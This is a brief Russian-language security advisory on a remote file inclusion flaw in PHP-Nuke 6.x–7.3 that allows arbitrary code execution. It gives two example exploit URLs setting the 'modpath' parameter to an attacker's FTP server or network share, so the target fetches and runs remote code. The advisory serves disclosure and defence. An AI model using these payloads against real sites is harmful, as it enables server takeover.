Программа: PHP-Nuke 6.x - 7.3 

Уязвимость включения файла обнаружена в PHP-Nuke. Удаленный пользователь может выполнить произвольный код на целевой системе. 

Пример:

http://localhost/nuke73/index.php?modpath =ftp://[attacker]/directory/
http://localhost/nuke73/index.php?modpath =//attacke r_ip/share_name/

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии